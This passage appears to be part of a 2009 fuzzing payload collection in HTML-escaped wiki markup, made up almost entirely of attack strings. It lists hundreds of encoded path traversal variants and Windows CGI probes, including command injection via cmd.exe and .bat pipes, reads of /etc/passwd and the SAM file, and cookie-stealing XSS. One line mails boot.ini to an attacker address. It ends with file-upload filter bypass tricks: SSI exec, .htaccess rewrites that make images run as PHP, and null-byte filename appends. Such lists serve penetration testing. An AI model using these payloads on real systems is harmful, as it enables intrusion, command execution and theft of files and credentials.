..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI   (Update: 17 March 2009)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2009 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 s ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename &amp;lt;pre&amp;gt;Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
